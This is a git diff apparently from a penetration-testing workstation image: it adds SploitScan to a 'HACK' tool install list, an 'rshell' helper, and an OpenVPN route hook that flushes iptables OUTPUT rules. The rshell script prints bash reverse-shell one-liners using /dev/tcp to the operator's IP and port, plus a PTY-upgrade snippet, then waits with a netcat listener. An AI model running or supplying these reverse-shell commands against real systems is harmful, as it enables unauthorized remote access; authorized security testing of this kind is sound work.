diff --git a/guest/Dockerfile b/guest/Dockerfile
index 464ed82..0cab665 100644
--- a/guest/Dockerfile
+++ b/guest/Dockerfile
@@ -800,6 +800,7 @@ RUN /pkg-install.sh HACK ghbin ekzhang/bore  '%arch:aarch64=arm%-unknown-linux'
 	&& /pkg-install.sh HACK ghbin praetorian-inc/noseyparker         'linux-'                                    noseyparker \
 	&& /pkg-install.sh HACK bin 'https://gitlab.com/api/v4/projects/33695681/packages/generic/nrich/latest/nrich_latest_amd64.deb' `# x86_64 only` \
 	&& /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb'            `# x86_64 only` \
+	&& /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py'                    sploitscan \
 	&& /pkg-install.sh HACK ghbin hueristiq/xurlfind3r               'linux_%arch:x86_64=amd64:aarch64=arm64%'   xurlfind3r
 RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker                       'linux'                                     kalker \
 	&& /pkg-install.sh LARGE ghbin PowerShell/PowerShell  'deb_%arch1%.deb'
diff --git a/guest/fs-root/sf/bin/rshell b/guest/fs-root/sf/bin/rshell
new file mode 100755
index 0000000..17e9920
--- /dev/null
+++ b/guest/fs-root/sf/bin/rshell
@@ -0,0 +1,47 @@
+#! /usr/bin/env bash
+
+source /sf/bin/funcs.sh
+
+load() {
+    [[ ! -f "$2" ]] && return 255
+    eval "${1}=$(<"$2")"
+}
+
+ERREXIT() {
+    local code="$1"
+
+    shift 1
+    [[ -n $1 ]] && echo -e >&2 "${CR}ERROR:${CN} $*"
+
+    exit "${code:-99}"
+}
+
+load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
+load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
+echo -e "\
+Use any of these commands on the remote system:${CDR}
+    bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'
+    (bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &
+${CN}
+Once connected, cut & paste this into the remote shell:${CDC}
+command -v python >/dev/null \\
+  && exec python -c 'import pty; pty.spawn(\"bash\")' \\
+  || exec script -qc bash /dev/null
+
+export SHELL=/bin/bash
+export TERM=xterm-256color
+reset -I
+PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'
+eval \$(resize)
+${CN}To force-exit this shell, type ${CDY}kill \"\$(pgrep -P $$)\"${CN}
+-----------------------------------"
+# PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
+
+
+cfg=$(stty --save)
+stty raw  -echo opost
+time nc -vnlp "$rport"
+echo "Restoring TTY"
+stty "$cfg"
+# reset -I
+
diff --git a/sfbin/ovpn_up.sh b/sfbin/ovpn_up.sh
new file mode 100644
index 0000000..ae8d927
--- /dev/null
+++ b/sfbin/ovpn_up.sh
@@ -0,0 +1,22 @@
+#! /bin/bash
+# Executed by OpenVPN --up within master/OpenVPN context
+
+source /sf/bin/funcs_net.sh
+
+# echo "$*" >/tmp/up_args.txt
+# set >/tmp/up_set.txt
+
+[[ -z $WG_DEV ]] && WG_DEV="vpnEXIT"
+
+# Inside this context the PATH needs to be exported:
+export PATH
+
+# Add the OpenVPN PEER as default route
+nsenter.u1000 --setuid 0 --setgid 0 -t "${PID:?}" -n ip route add "${trusted_ip:?}" via "${SF_NET_LG_ROUTER_IP:?}" dev eth0 
+# Remove old default route.
+set_route_post_up
+# Remove all BLOCKING OUTPUT rules that were needed between OpenVPN starting
+# and the device becoming available.
+nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F OUTPUT
+rm -rf "/tmp/lg-${LID}"
+